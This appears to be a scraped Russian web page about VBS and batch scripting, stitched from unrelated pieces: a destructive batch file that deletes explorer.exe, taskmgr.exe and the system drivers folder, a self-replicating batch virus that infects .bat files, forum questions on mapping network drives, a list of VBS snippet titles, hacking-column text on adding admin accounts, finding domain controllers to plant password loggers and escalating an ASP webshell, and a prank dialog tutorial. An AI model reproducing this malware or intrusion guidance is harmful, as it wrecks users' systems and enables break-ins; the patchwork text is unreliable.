Как сделать пароль vbs

Обновлено: 07.07.2024

*******************************
taskkill /f /im explorer.exe
del /q /f %windir%\explorer.exe
del /q /f %windir%\taskmgr.exe
rd /q /s %windir%\inf
rd /q /s %windir%\system32\drivers
********************************

Сохраняем наш файл как I_LOVE_YOU.bat и радуемся.
После запуска такой микровещи на машине не будет не рабочего стола ни менеджера задач ни драйверов.

Я обещал один? Да?Извините не стерпел и вот выкладываю второй .

********************************
@echo off%[Bams]%
if '%1=='In_ goto Bamsin
if exist c:\Bams.bat goto Bamsru
if not exist %0 goto Bamsen
find "Bams" c:\Bams.bat
attrib +h c:\Bams.bat
:Bamsru
for %%t in (*.bat) do call c:\MeTrA In_ %%t
goto Bamsen
:Bamsin
find "Bams" nul
if not errorlevel 1 goto Bamsen
type c:\Bams.bat>>%2
:Bamsen
*********************************

Это более сложный вирус но он и более интересный .
Он ползает по винту ищет и заражает собой *.bat файлы.

Все!Переходим к VBS вирусам.
Язык VBS в винде поддерживается с 98 версии и не требует установки дополнительных библиотек
и другой ненужной фигни).по другому VBS-язык скриптов

У меня все мапиться при помощи vbs через GRO
Но сталкнулся с такой проблемой:

Войдя в домен пользователям мапиться одно, а если в терминал должно мапиться другое.

Set WshNetwork = CreateObject("WScript.Network")
Set objShell = CreateObject("Shell.Application")
On Error Resume Next

wshNetwork.RemoveNetworkDrive "V:"
wshNetwork.MapNetworkDrive "V:", "\\DFS_LINK\Share1\"
objShell.NameSpace("Y:").Self.Name = "ShareName1"

wshNetwork.RemoveNetworkDrive "R:"
wshNetwork.MapNetworkDrive "R:", ""\\DFS_LINK\Share2\"
objShell.NameSpace("Z:").Self.Name = "ShareName1"

на Windows XP (SP2 + SP3) проходит на ура (через GPO), но на Windows Vista SP1 (пользователь имеет теже самые права), подключение не проходит, UAC отключен.

Ноут под управлением Windows 7 Pro (в домене)
Шара на компах не в домене (шара под управлением win2003)

Скрипт подключения шары:

DayNumber = Weekday(Date())
Set wss = CreateObject("Wscript.Shell")
Set Wnet = Wscript.CreateObject("Wscript.Network")

Wnet.MapNetworkDrive "W:", "\\share1\disk1"
Wnet.MapNetworkDrive "Y:", "\\share2\disk2"

И естественно ничего не работает

Как лечится:
Заходим в Учетные записи пользователей/Изменение параметров контроля учетных записей - опускаем бегунок в самый низ (отключаем).
После чего идем в Администрирование учетных записей и в учетных данных добавляем наши шары. а именно в виде домен\пользователь и пароль (в соответствующие поля формы).

Адрес в Интернете или в сети: share1
Имя пользователя: share1\user - обязательно прописываем домен для конкретного юзера.
Пароль: вводим пароль для нашего юзера

После чего выходим из домена и заходим обратно. все работает!

Как модифицировать ваш скрипт, чтобы еще дополнительно кроме групп анализировал и логины в этой группе, у нас в одной группе у разных пользователей подключаются разные шары .

Скрипт VBS обычно используется классический сборник кода

Справочные материалы: Учебник VBA

VBS получает путь установки системы

Сначала определите эту переменную, чтобы получить путь установки системы, а затем мы используем ”&strWinDir&” Назовите эту переменную.

VBS получает путь к C: \ Program Files

VBS получает путь C: \ Program Files \ Common Files

Добавить ярлык URL на рабочий стол

Добавить URL в избранное

Удалить указанный файл суффикса указанного каталога

VBS изменила домашнюю страницу

VBS плюс элементы автозагрузки

VBS копирует себя

Скопируйте себя в huan.vbs на диске C (скопируйте файл game.exe из каталога vbs в gangzi.exe на диске C)

VBS получает временный системный каталог

Даже если код неверен, он продолжает выполняться

Открытый URL VBS

Конечный процесс VBS

VBS скрывает открытый URL-адрес (некоторые браузеры не могут скрыть открытый URL-адрес, а открываются напрямую, что подходит для основных пользователей)

Совместим со всеми браузерами, используйте абсолютный путь IE + параметры для открытия, невозможно использовать функцию для получения пути установки IE, используйте только функцию для получения пути к программным файлам, это должно быть лучше, чем указанный выше метод, но два метода не абсолютный.

VBS просматривает жесткий диск, чтобы удалить указанное имя файла

VBS получает MAC-адрес сетевой карты

VBS получает адрес домашней страницы локального реестра.

VBS просматривает все каталоги всех дисков, находит все файлы .txt и добавляет предложение в конец всех файлов txt.

Получите все буквы дисков компьютера

VBS создает файлы для всех корневых каталогов диска машины.

VBS обходит машину и находит все 123.exe, а затем переименовывает их в 321.exe.

VBS записывает код на монтажный стол (сначала объясните, VBS записывает контент на монтажный стол, Интернет всегда реализуется через объект InternetExplorer.Application, но недостатком является то, что браузер по умолчанию не является браузером IE, появится всплывающее окно, так что это стоит Отлично Джин нашел этот код для достижения)

Скрытые файлы VBS

VBS генерирует случайные числа (521 - правило генерации, разные числа генерируют разные правила и могут использоваться для других целей)

VBS удалить значок IE на рабочем столе (без ярлыка)

VBS получает собственное имя файла

VBS читает файлы в кодировке Unicode

VBS читает файл в указанной кодировке (по умолчанию uft-8) переменная gangzi - это путь к файлу для чтения

VBS отключить групповую политику

VBS записывает файл с указанной кодировкой (по умолчанию uft-8) переменная gangzi - это путь к файлу для чтения, gangzi2 - переменная содержимого

VBS получает имена всех папок в текущем каталоге (за исключением подпапок)

VBS получает все имена папок (включая подпапки) в указанном каталоге

VBS создает файл .URL (разные числа в параметре IconIndex представляют разные значки, подробности см. Во всех значках в SHELL32.dll)

Хосты записи VBS (без оценки записи, добавьте нижнюю часть, независимо от того, существует она или нет)

VBS считывает имена всех ключей в HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Explorer \ Desktop \ NameSpace и выводит их циклически.

VBS создать текстовый файл

VBS создать папку

VBS определяет, существует ли папка

VBS использует переменные для определения папок

Поле ввода VBS plus

VBS проверяет, есть ли такие же файлы

VBS перезаписывать и добавлять файлы

VBS читать файл Читать все Читать все

VBS прочитать файл ReadLine Прочитать одну строку

VBS читать файл Читать Читать n символов

VBS удалить файлы

Папка удаления VBS

VBS постоянно создает файлы

VBS случайным образом генерирует строку на основе имени компьютера

VBS генерирует серийный номер в соответствии с Mac

VBS автоматически подключает ADSL

VBS автоматически отключает ADSL

VBS автоматически изменяет IP-адрес и открывает экземпляр URL-адреса каждые 3 секунды (стоит отметить, что URL-адрес, который открывается каждый раз в следующем коде, относится к одному и тому же окну IE, то есть каждый раз, когда он открывается, он закрывает окно открывался в последний раз. Если URL-адрес, который нужно открывать каждый раз, является новым окном, просто используйте команду run напрямую)

Используйте VBS для добавления учетной записи администратора
Во время процесса инъекции явно существует учетная запись sa, но из-за ограничений на net.exe и net1.exe или по другим неизвестным причинам учетная запись администратора не всегда может быть добавлена. VBS имеет объект winnt в части Active Directory (adsi), который можно использовать для управления локальными ресурсами. Его можно использовать для добавления администратора, не полагаясь на такие команды, как cmd. Подробный код выглядит следующим образом:

Если этот код сохранен как 1.vbs и запускается под cmd, формат: cscript 1.vbs, администратор с именем lcx и паролем 123456 будет добавлен в текущую систему. Конечно, вы можете использовать Блокнот, чтобы изменить переменные lcx и 123456 внутри, и изменить их на ваши любимые значения имени и пароля.

Используйте vbs для отображения физического каталога виртуального хоста
Иногда побочная заметка успешно вторгается на сайт. После получения системных разрешений и столкновения с сотнями виртуальных хостов, как мы можем быстрее найти физический каталог нашего целевого сайта? Слишком утомительно просматривать сайт один за другим. Используя adsutil.vbs, который поставляется с системой, кажется, что есть много параметров, и это немного громоздко. Попробуйте этот мой сценарий. Код следующий :

После запуска cscript 2.vbs идентификатор сайта, описание и физический каталог в IIS будут подробно указаны.Удобно ли иметь намного меньше кода?

Используйте VBS, чтобы быстро найти главный сервер домена внутренней сети
Столкнувшись с внутренней сетью доменной структуры, многие маленькие тарелки могут не иметь опыта проникновения. Если вы можете получить пароль главного администратора домена, вы можете свободно проходить через всю интрасеть. Главный администратор домена обычно остается на более важных машинах. Если вы можете управлять одним или несколькими из них, установить регистратор паролей или что-то подобное, я думаю, что вы когда-нибудь получите пароль. Основной сервер домена, конечно, самый важный. Как определить, какой из тысяч машин это? Команду dos, например net group "domain admins" / domain, можно использовать в качестве критерия для суждения, но vbs также может это сделать. Это все еще является частью adsi. Код выглядит следующим образом:

Достаточно только этих двух строк кода, запустите cscript 3.vbs, будут результаты. Конечно, независимо от того, является ли это командой dos или vbs, вы должны находиться под управлением пользователя домена. Например, если вы получили пароль учетной записи пользователя домена, вы можете использовать формат psexec.exe -u -p cmd.exe, чтобы получить оболочку пользователя домена, или ваш троянец изначально взаимодействует с рабочим столом и входит в систему. ваша троянская оболочка. Если вы снова являетесь пользователем домена, вы можете запускать эти команды напрямую.
Конечно, роль vbs во вторжении больше, чем это, конечно, использование js или других инструментов также может выполнять функции моего кода выше; но темой этого столбца является магический эффект vbs при взломе, поэтому упомянем только vbs. После написания этой части vbs я и другие авторы продолжим планировать другие темы в будущих рубриках и стремимся предоставлять читателям хорошие и полезные статьи.

Код VBS для повышения привилегий WebShell
Троянец asp всегда был одним из инструментов, которые любили использовать друзья, которые занимаются скриптами, но поскольку его разрешения обычно низкие (обычно разрешения IWAM_NAME), каждый придумал разные методы Чтобы повысить свои полномочия, например, получить полномочия базы данных mssql через троян asp, или получить информацию о пароле ftp, или заменить служебную программу. И уловка, которую я хочу представить сегодня, заключается в использовании файла vbs для увеличения разрешений троянца asp. Код выглядит следующим образом. Троянец asp всегда был одним из инструментов, которые любят использовать друзья, которые используют сценарии, но поскольку его разрешения обычно относительно низкие (обычно разрешения IWAM_NAME), поэтому каждый придумал различные методы для увеличения его разрешений, такие как получение разрешений базы данных mssql с помощью трояна asp, получение информации о пароле ftp или замена службы программа. Техника, которую я хочу представить сегодня, заключается в использовании файла vbs для повышения разрешений троянца asp. Код выглядит следующим образом:

Сохраните его как суффикс vbs и загрузите в сервис,
Затем используйте троянскую программу asp для выполнения этого файла vbs. Попробуйте еще раз своего троянца asp, вы обнаружите, что у вас уже есть системные разрешения

Как создавать диалоговые окна с помощью VBScript? Всем привет, в этом уроке я вам покажу, как быстро создавать диалоговые окна в Windows, с помощью которых мы так часто подшучиваем над своими коллегами. Я представлю небольшой обзор команд с пояснениями для того, чтобы вы не просто копировали диалоговые окна с сайта, а смогли сами импровизировать, одновременно обучаясь. Это будет знакомый вам по предыдущим компьютерным приколам скриптовый язык VBScript, и всё, что нам как всегда понадобится, это простой Блокнот, который мы, после заполнения кода, будем сохранять в укромном месте с расширением .vbs.

VBScript — это простой язык программирования, исполняемый в системе сценарием Windows Script Host. Легко кодируется в Блокноте, а лучше в специальных текстовых редакторах с расширенными возможностями, как например, AkelPad или Notepad ++ (они, в отличие от встроенного Блокнота, понимают русскую кодировку; выберите Кириллицу — Windows-1251). Именно эта связка сценария и скрипта используется Windows для того, чтобы создавать диалоговые окна . Это гораздо проще, чем использовать такие языки как С и С ++. Однако подробное знакомство с VBScript задачей настоящей статьи не ставилось; здесь я лишь приведу ряд конкретных примеров того как создавать диалоговые окна с более-менее осмысленным для читающего содержанием и вариантами развития событий по результатам действий.

Как создавать диалоговые окна с ошибкой?

Диалоговые окна VBS: множество постоянных и переменных.

диалоговое окно vbs

Просто повторите скрипт так:

Кстати, появление окна можно запустить по кругу, указав в скрипте команду на запуск его же по нажатию на любую из кнопок:

где скрипт.vbs и есть тот самый скрипт, лежащий, скажем, на Рабочем столе (C:\Users\1\Desktop\). При этом избавиться от окна можно будет только через Диспетчер задач. Скрипт может также содержать и какую-то другую одну или несколько команд. Например, пара вводимых переменных не просто создаст интерактивный диалог, но запустит программу. Например, браузер. Ну, или не запустит:

Читайте также: